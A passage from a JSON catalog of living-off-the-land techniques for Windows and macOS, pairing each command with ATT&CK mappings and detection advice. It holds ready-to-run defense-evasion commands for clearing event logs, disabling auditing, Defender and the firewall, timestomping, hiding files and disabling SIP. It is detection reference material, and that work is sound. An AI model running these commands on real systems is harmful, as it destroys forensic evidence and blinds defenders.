extraction.","mitre":["T1202","T1003.003"],"privilege":"admin","detection":[{"type":"Detection","value":"diskshadow.exe /s with a script file; diskshadow creating/exposing shadow copies; child processes spawned by diskshadow.exe; reads of NTDS.dit or SAM/SYSTEM via a shadow-copy path shortly after a snapshot."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Diskshadow.yml","https://attack.mitre.org/techniques/T1003/003/"],"added":true,"verifyNote":"LOLBAS Diskshadow.yml documents `diskshadow.exe /s {PATH:.txt}` (T1003.003, NTDS exfil via VSS) and `exec {PATH:.exe}` child-process spawn (T1202); FIX: removed T1006 — not in the LOLBAS mapping and diskshadow's VSS snapshot is squarely T1003.003, so only T1202+T1003.003 are retained.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:wevtutil:31","toolId":"daemon:wevtutil","toolName":"wevtutil.exe","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Windows Event Logs"],"command":"wevtutil cl Security","description":"The built-in event log utility clears (empties) a named Windows Event Log channel with the cl / clear-log verb, destroying recorded evidence. An optional /bu: switch backs the log up first; adversaries omit it.","usecase":"Erase Security/System/Application logs after intrusion activity to remove indicators of compromise.","mitre":["T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Security Event ID 1102 (audit log cleared) and System 104 (log file cleared). Log process creation (Sysmon 1 / Security 4688) for wevtutil.exe with 'cl' or 'clear-log' arguments; forward events to a SIEM so cleared local copies still survive centrally."}],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"],"added":true,"verifyNote":"MS Learn wevtutil doc confirms 'cl|clear-log <Logname> [/bu:<Backup>]' clears a log (docs example: wevtutil cl Application /bu:...); maps to ATT&CK T1070.001. No change.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:wevtutil:32","toolId":"daemon:wevtutil","toolName":"wevtutil.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable Windows Event Logging"],"command":"wevtutil sl Security /e:false","description":"The set-log (sl) verb with /e:false disables a Windows Event Log channel so future events for that channel are no longer written, blinding defenders without clearing existing entries.","usecase":"Disable Security or PowerShell operational channels before running noisy tooling so nothing is recorded.","mitre":["T1562.002","T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor process creation (Sysmon 1 / 4688) for wevtutil.exe with 'sl' plus '/e:false'. Watch Event ID 1100/1102/4719 (audit policy or log service state change) and alert on any channel being disabled, especially Security, System, and Microsoft-Windows-PowerShell/Operational."}],"references":["https://attack.mitre.org/techniques/T1562/002/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"],"added":true,"verifyNote":"MS Learn wevtutil doc confirms 'sl|set-log' with '/e:<Enabled>' where Enabled is true or false ('Enables or disables a log'); primary ATT&CK ID T1562.002 is accurate (T1070.001 is a related secondary tag). No change.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:powershell:33","toolId":"daemon:powershell","toolName":"Clear-EventLog","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Windows Event Logs"],"command":"Clear-EventLog -LogName Security","description":"The Windows PowerShell 5.1 Clear-EventLog cmdlet deletes all entries from a specified classic event log on a local or remote computer, an alternative to wevtutil for the same log-clearing effect.","usecase":"Clear event logs from within an existing PowerShell session without spawning wevtutil.exe.","mitre":["T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Event ID 1102/104 as with any clear. Enable PowerShell Script Block Logging (4104) and Module Logging to capture the Clear-EventLog invocation; correlate with Sysmon 1 for powershell.exe. Sysmon's own channel typically survives a Security-log clear and preserves the trail."}],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/clear-eventlog"],"added":true,"verifyNote":"MS Learn confirms Clear-EventLog 'deletes all of the entries from the specified event logs on the local computer or on remote computers' (classic-log cmdlet, requires Administrators); ATT&CK T1070.001. No change.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:powershell:34","toolId":"daemon:powershell","toolName":"Remove-EventLog","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Windows Event Logs"],"command":"Remove-EventLog -LogName Security","description":"The Windows PowerShell 5.1 Remove-EventLog cmdlet deletes a classic event log entirely and unregisters its event sources, which can suppress future logging for that log until it is recreated (often after reboot).","usecase":"Delete and deregister a log so the intrusion leaves less evidence and future events are not captured.","mitre":["T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Capture the cmdlet via Script Block Logging (4104) and Sysmon 1 for powershell.exe. Baseline the expected set of registered event logs and alert when a standard log (Security, System, Application) is missing or its sources are deregistered."}],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/remove-eventlog?view=powershell-5.1"],"added":true,"verifyNote":"MS Learn (PS 5.1) confirms Remove-EventLog 'deletes an event log file ... and unregisters all its event sources'; classic EventLog cmdlet (5.1 only, not PS7). No change.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:auditpol:35","toolId":"daemon:auditpol","toolName":"auditpol.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable Windows Event Logging"],"command":"auditpol /set /category:\"System\" /success:disable /failure:disable","description":"The built-in audit policy tool sets a subcategory or category to stop generating success/failure audit events; auditpol /clear /y wipes the entire advanced audit policy. Either action suppresses the events defenders rely on.","usecase":"Turn off auditing for noisy categories (e.g. process creation, logon) before operating, so key telemetry is never written.","mitre":["T1562.002"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Event ID 4719 (System audit policy was changed) and 4907. Log process creation for auditpol.exe with '/set ... /success:disable', '/failure:disable', '/clear', or '/remove'. Periodically compare live 'auditpol /get /category:*' output against a known-good baseline."}],"references":["https://attack.mitre.org/techniques/T1562/002/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"],"added":true,"verifyNote":"MS Learn auditpol-set confirms '/set ... /category:<name> /success:<enable|disable> /failure:<enable|disable>' and auditpol '/clear'/'/remove' sub-commands; ATT&CK T1562.002. No change.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:fsutil:36","toolId":"daemon:fsutil","toolName":"fsutil.exe","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Delete Volume USN Journal"],"command":"fsutil usn deletejournal /d C:","description":"The fsutil usn deletejournal subcommand with /d disables the NTFS Update Sequence Number (USN) change journal on a volume and deletes its records, destroying a key forensic timeline of file creation, deletion, and modification.","usecase":"Wipe the NTFS change journal to hamper forensic reconstruction of file-level activity on a compromised host.","mitre":["T1070"],"privilege":"admin","detection":[{"type":"Detection","value":"Log process creation (Sysmon 1 / 4688) for fsutil.exe with 'usn' and 'deletejournal'. During forensics, a reset USN journal ID or an abrupt discontinuity/gap in journal records indicates deletion; ship file-audit and journal data off-host in near real time."}],"references":["https://attack.mitre.org/techniques/T1070/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn"],"added":true,"verifyNote":"MS Learn fsutil-usn confirms 'fsutil usn deletejournal {/d|/n} <volumepath>' with '/d' disabling the active USN change journal (docs example: fsutil usn deletejournal /d c:); ATT&CK T1070. No change.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:attrib:37","toolId":"daemon:attrib","toolName":"attrib.exe","name":"Hide Artifacts","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Hide Artifacts","Hidden Files and Directories"],"command":"attrib +h +s C:\\Windows\\Temp\\x\\payload.exe","description":"The built-in attrib command sets the Hidden (+h) and System (+s) file attributes so a file is concealed from default Explorer and 'dir' views, a simple way to hide dropped artifacts on disk.","usecase":"Conceal a dropped executable or staging file from casual inspection of a directory.","mitre":["T1564.001"],"privilege":"user","detection":[{"type":"Detection","value":"Log process creation (Sysmon 1 / 4688) for attrib.exe with '+h' and especially '+s' on files in user-writable paths (Temp, ProgramData, AppData). Hunt the file system for files carrying both Hidden and System attributes in atypical locations."}],"references":["https://attack.mitre.org/techniques/T1564/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/attrib"],"added":true,"verifyNote":"MS Learn attrib doc confirms '{+|-}h' sets the Hidden and '{+|-}s' sets the System file attribute; ATT&CK T1564.001. No change.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:powershell:38","toolId":"daemon:powershell","toolName":"PowerShell","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Timestomp"],"command":"$(Get-Item C:\\Windows\\Temp\\x\\payload.exe).LastWriteTime = '01/01/2016 00:00:00'; [IO.File]::SetCreationTime('C:\\Windows\\Temp\\x\\payload.exe','01/01/2016')","description":"PowerShell can rewrite a file's $STANDARD_INFORMATION timestamps via the .CreationTime/.LastWriteTime/.LastAccessTime properties of a FileInfo object or the [System.IO.File]::SetCreationTime/SetLastWriteTime .NET methods, blending a malicious file in with legitimate neighbors (timestomping).","usecase":"Backdate or match a dropped file's MACE timestamps to defeat timeline analysis and 'recently modified' triage.","mitre":["T1070.006"],"privilege":"user","detection":[{"type":"Detection","value":"Sysmon Event ID 2 (FileCreateTime changed) flags user-mode $SI edits. Capture Script Block Logging (4104) for '.CreationTime =', '.LastWriteTime =', '[IO.File]::SetCreationTime', etc. In MFT forensics, a $STANDARD_INFORMATION timestamp earlier than the matching $FILE_NAME timestamp is a classic timestomp signature."}],"references":["https://attack.mitre.org/techniques/T1070/006/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"],"added":true,"verifyNote":"MS Learn .NET docs confirm System.IO.File.SetCreationTime/SetLastWriteTime and the FileInfo LastWriteTime/CreationTime settable properties; Atomic Red Team T1070.006 documents PowerShell timestomp; ATT&CK T1070.006. No change.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:powershell:39","toolId":"daemon:powershell","toolName":"Add-MpPreference","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable or Modify Tools"],"command":"Add-MpPreference -ExclusionPath 'C:\\Windows\\Temp\\x'\nAdd-MpPreference -ExclusionProcess 'C:\\Windows\\Temp\\x\\payload.exe'\nAdd-MpPreference -ExclusionExtension 'exe'","description":"The Defender module's Add-MpPreference cmdlet adds entries to the Microsoft Defender Antivirus exclusion list so matching items are no longer scanned in real time or on schedule: -ExclusionPath excludes a folder/file, -ExclusionProcess excludes any files opened by a named process, and -ExclusionExtension excludes an entire file type. Any of the three carves a blind spot for staging and executing tooling.","usecase":"Carve a Defender blind spot by excluding a staging path, an attacker process, or a whole extension before dropping tooling.","mitre":["T1562.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor Defender Operational Event ID 5007 (configuration changed) and registry writes under HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\{Paths|Processes|Extensions} (Sysmon 13). Capture Add-MpPreference via Script Block Logging (4104) and alert on any new exclusion, especially paths/processes in Temp/AppData/ProgramData and extension-wide exclusions (rarely legitimate on endpoints). Enable Tamper Protection and centrally alert on exclusion drift."}],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/powershell/module/defender/add-mppreference"],"added":true,"verifyNote":"MERGED from three near-duplicate Add-MpPreference exclusion entries (same toolId + same command intent — adding a Defender AV exclusion, all T1562.001). MS Learn confirms -ExclusionPath ('disables Windows Defender scheduled and real-time scanning for files in this folder'), -ExclusionProcess ('excludes any files opened by the processes that you specify'), and -ExclusionExtension ('exclude from scheduled, custom, and real-time scanning'); the three write to the Exclusions Paths/Processes/Extensions registry subkeys respectively. Technique mapping unchanged.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:powershell:40","toolId":"daemon:powershell","toolName":"Set-MpPreference","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable or Modify Tools"],"command":"Set-MpPreference -DisableRealtimeMonitoring $true","description":"The Defender module's Set-MpPreference cmdlet with -DisableRealtimeMonitoring $true turns off Microsoft Defender Antivirus real-time protection, stopping on-access scanning of files and processes host-wide.","usecase":"Disable real-time protection so subsequent malicious files execute without being scanned or quarantined.","mitre":["T1562.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Defender Operational Event ID 5001 (real-time protection disabled) and 5007/5010. Capture 'Set-MpPreference -DisableRealtimeMonitoring' and related '-Disable*' toggles via Script Block Logging (4104). Enable Tamper Protection, which blocks this change and logs the attempt."}],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference"],"added":true,"verifyNote":"MS Learn confirms Set-MpPreference -DisableRealtimeMonitoring (Boolean) governs real-time protection; Defender Operational Event ID 5001 (real-time protection disabled) / 5007 (config changed) confirmed via Microsoft community/Sentinel guidance; ATT&CK T1562.001. No change.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:reg:41","toolId":"daemon:reg","toolName":"reg.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Modify Registry"],"command":"reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD /d 1 /f","description":"The built-in reg.exe writes the legacy DisableAntiSpyware policy value to turn off Microsoft Defender Antivirus via the registry. Modern Windows blocks or ignores this value under Tamper Protection, but the write attempt itself is a well-known evasion indicator.","usecase":"Attempt to disable Defender through a policy registry key rather than the Defender cmdlets.","mitre":["T1562.001","T1112"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor registry writes to HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware (Sysmon 13) and process creation for reg.exe targeting that key. Tamper Protection generates Defender Event ID 5007 on the blocked attempt; treat any DisableAntiSpyware write as malicious on managed endpoints."}],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware"],"added":true,"verifyNote":"MS Learn DisableAntiSpyware doc confirms the value disables Defender AV and that it is now ignored/removed on modern Windows and protected by Tamper Protection (platform 4.18.2108.4+) - matching the entry's caveat; reg.exe add /v /t REG_DWORD /d /f is standard; ATT&CK T1562.001 + T1112. No change.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:netsh:42","toolId":"daemon:netsh","toolName":"netsh.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable or Modify System Firewall"],"command":"netsh advfirewall set allprofiles state off","description":"The built-in netsh advfirewall context sets the state of all Windows Defender Firewall profiles (Domain, Private, Public) to off, removing host-based network controls that would otherwise limit inbound/outbound activity.","usecase":"Turn off the host firewall to allow attacker tooling, C2, or lateral-movement traffic unimpeded.","mitre":["T1562.004"],"privilege":"admin","detection":[{"type":"Detection","value":"Log process creation (Sysmon 1 / 4688) for netsh.exe with 'advfirewall' and 'state off'. Alert on Windows Firewall Event ID 2003 (a firewall setting was changed) and 2009. Also watch sc.exe/net.exe targeting the MpsSvc service. Enforce firewall state centrally via GPO/Intune and alert on drift."}],"references":["https://attack.mitre.org/techniques/T1562/004/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/netsh-advfirewall"],"added":true,"verifyNote":"MS Learn netsh-advfirewall doc confirms 'netsh advfirewall set [allprofiles|...] state <on|off|notconfigured>' where off 'Disables the firewall'; Windows Firewall Event ID 2003 (profile setting changed) confirmed; ATT&CK T1562.004. No change.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:byovd:43","toolId":"daemon:byovd","toolName":"BYOVD (vulnerable driver)","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion","Privilege Escalation"],"nativeCategory":["Impair Defenses","Bring Your Own Vulnerable Driver"],"command":"# BYOVD is documented here as a NAMED concept only. No exploitation steps are provided. Reference the LOLDrivers catalog for known-vulnerable signed drivers and the vendor blocklist for defensive coverage.","description":"Bring Your Own Vulnerable Driver (BYOVD) is a named, publicly-documented class of technique in which an adversary who already holds local administrator rights loads a legitimately signed but known-vulnerable kernel driver, then abuses that driver's flaw to gain kernel-mode code execution and disable or blind EDR/AV. This entry catalogs the concept and detection surface only; it contains no driver-exploitation procedure.","usecase":"Understand and detect kernel-level tampering where a signed vulnerable driver is used to kill or blind security tooling.","mitre":["T1068","T1562.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor Sysmon Event ID 6 (driver loaded) and Security 4697/System 7045 (new kernel-mode service) for drivers matching LOLDrivers hashes/signatures or loading from user-writable paths. Enforce the Microsoft Vulnerable Driver Blocklist and WDAC/HVCI to block known-bad drivers. Alert on unexpected drivers signed by unrelated third parties on servers/workstations."}],"references":["https://attack.mitre.org/techniques/T1068/","https://www.loldrivers.io/"],"added":true,"verifyNote":"Concept-only (no exploit steps); LOLDrivers.io is the canonical public catalog of known-vulnerable signed drivers and ATT&CK T1068 (Exploitation for Priv-Esc) + T1562.001 map to BYOVD; Sysmon 6 / Security 4697 / System 7045 detection is accurate. No change.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:powershell:44","toolId":"daemon:powershell","toolName":"Clear-History","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Command History"],"command":"Clear-History; Remove-Item (Get-PSReadlineOption).HistorySavePath","description":"Clear-History flushes the current PowerShell session's in-memory history, while deleting the PSReadLine save path (ConsoleHost_history.txt) removes the persistent, cross-session command history; Set-PSReadLineOption -HistorySaveStyle SaveNothing disables future history writes. Together these hide the commands an operator ran.","usecase":"Erase both session and persistent PowerShell command history to conceal executed commands.","mitre":["T1070.003"],"privilege":"user","detection":[{"type":"Detection","value":"Capture Script Block Logging (4104) for 'Clear-History', 'Remove-Item ...HistorySavePath', '(Get-PSReadlineOption).HistorySavePath', and 'Set-PSReadLineOption -HistorySaveStyle SaveNothing'. Alert when ConsoleHost_history.txt is deleted, emptied, or truncated (file-audit / Sysmon 23 file-delete). Prefer transcript logging and central forwarding, which survive local history deletion."}],"references":["https://attack.mitre.org/techniques/T1070/003/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"],"added":true,"verifyNote":"MS Learn confirms Set-PSReadLineOption -HistorySaveStyle SaveNothing ('Don't use a history file') and HistorySavePath ($($Host.Name)_history.txt, e.g. ConsoleHost_history.txt); Clear-History is a built-in cmdlet; Atomic Red Team T1070.003 documents the technique (also corroborated by Black Hills InfoSec write-up); ATT&CK T1070.003. No change.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"loobins:GetFileInfo:764efced340d4784","toolId":"loobins:GetFileInfo","toolName":"GetFileInfo","name":"Iterate through a directory to GetFileInfo","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"for FILE in ~/Downloads/*; do echo $(GetFileInfo $FILE) >> fileinfo.txt; sleep 2; done","description":"A bash or zsh oneliner can provide an attacker with information about specific files of interest.","mitre":[],"fullPath":["/usr/bin/GetFileInfo"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/GetFileInfo.yml","https://macosbin.com/bin/getfileinfo"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:SetFile:16396f8014d822c7","toolId":"loobins:SetFile","toolName":"SetFile","name":"Set a file or directory attribute to invisible","source":"LOOBins","platform":["macOS"],"capability":["Persistence","Defense Evasion"],"nativeCategory":["Persistence","Defense Evasion"],"command":"for FILE in ~/*; do echo $(SetFile -a V $FILE && echo $(GetFileInfo $FILE)) >> /tmp/fileinfo.txt; sleep 2; done","description":"A bash or zsh oneliner can allow an attacker to set the file attribute to invisible. This action can establish persistence and evade detection for malicious files on the system.","mitre":[],"fullPath":["/usr/bin/SetFile"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/SetFile.yml","https://daringfireball.net/2008/04/the_invisible_bit"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:SetFile:60497c149294fffb","toolId":"loobins:SetFile","toolName":"SetFile","name":"Change a file's creation and modification timestamps","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"SetFile -d \"04/25/2023 11:11:00\" -m \"04/25/2023 11:12:00\" targetfile.txt","description":"Setfile can be used with the -d and -m arguments to alter a file's creation and modification date, respectively.","mitre":[],"fullPath":["/usr/bin/SetFile"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/SetFile.yml","https://daringfireball.net/2008/04/the_invisible_bit"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:caffeinate:eed3d0d746ebad74","toolId":"loobins:caffeinate","toolName":"caffeinate","name":"Fork a process","source":"LOOBins","platform":["macOS"],"capability":["Execution","Defense Evasion"],"nativeCategory":["Execution","Defense Evasion"],"command":"caffeinate -i /tmp/evil","description":"Make caffeinate fork a process and hold an assertion that prevents idle sleep as long as that process is running","mitre":[],"fullPath":["/usr/bin/caffeinate"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/caffeinate.yml","https://macosbin.com/bin/caffeinate","https://ss64.com/osx/caffeinate.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:caffeinate:b64b930cbcc85165","toolId":"loobins:caffeinate","toolName":"caffeinate","name":"Prevent a sleep","source":"LOOBins","platform":["macOS"],"capability":["Execution"],"nativeCategory":["Execution"],"command":"caffeinate -u -t 14400","description":"Prevent a macOS from going to sleep for 4 hours (14400 seconds)","mitre":[],"fullPath":["/usr/bin/caffeinate"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/caffeinate.yml","https://macosbin.com/bin/caffeinate","https://ss64.com/osx/caffeinate.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:chflags:6dc222e2477a144c","toolId":"loobins:chflags","toolName":"chflags","name":"Hide a file","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"chflags hidden ~/evil","description":"Add the hidden flag to a file or directory to prevent it from being \nvisible in Finder and Terminal.","mitre":[],"fullPath":["/usr/bin/chflags"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Hidden Flag Set On File/Directory Via Chflags","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_chflags_hidden_flag.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/chflags.yml","https://ss64.com/mac/chflags.html","https://macosbin.com/bin/chflags","https://eclecticlight.co/2024/07/03/how-to-hide-files-and-folders/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:chflags:657af3584bd20804","toolId":"loobins:chflags","toolName":"chflags","name":"Remove hidden flag","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"chflags nohidden ~/evil","description":"Remove the hidden flag to a file or directory to make it visible in Finder\nand Terminal.","mitre":[],"fullPath":["/usr/bin/chflags"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: Hidden Flag Set On File/Directory Via Chflags","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_chflags_hidden_flag.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/chflags.yml","https://ss64.com/mac/chflags.html","https://macosbin.com/bin/chflags","https://eclecticlight.co/2024/07/03/how-to-hide-files-and-folders/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:codesign:7e467a3d8b50ed97","toolId":"loobins:codesign","toolName":"codesign","name":"Ad-hoc codesigning an app bundle","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"codesign --force --deep -s - MyApp.app","description":"This command forcefully re-signs the MyApp.app application with an ad-hoc signature, applying the signature deeply to all nested code within the app","mitre":[],"fullPath":["/usr/bin/codesign"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect ad-hoc codesigning activity","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/adhoc_codesigning.yaml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/codesign.yml","https://www.sentinelone.com/blog/when-apple-admits-macos-malware-is-a-problem-its-time-to-take-notice/","https://ss64.com/mac/codesign.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:csrutil:26103c8c140bf3a9","toolId":"loobins:csrutil","toolName":"csrutil","name":"Disable SIP","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"csrutil disable","description":"disable SIP (System Integrity Protection) - requires booting into recovery mode","mitre":[],"fullPath":["/usr/bin/csrutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: System Integrity Protection (SIP) Disabled","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml"},{"type":"Sigma: System Integrity Protection (SIP) Enumeration","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_status.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml","https://developer.apple.com/forums/thread/4002","https://attack.mitre.org/techniques/T1518/001/","https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:csrutil:a0a1b78e4d71e620","toolId":"loobins:csrutil","toolName":"csrutil","name":"Disable authenticated-root","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"csrutil authenticated-root disable","description":"When authenticated-root is disabled, booting is allowed from non-sealed system snapshots - requires booting into recovery mode","mitre":[],"fullPath":["/usr/bin/csrutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Sigma: System Integrity Protection (SIP) Disabled","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml"},{"type":"Sigma: System Integrity Protection (SIP) 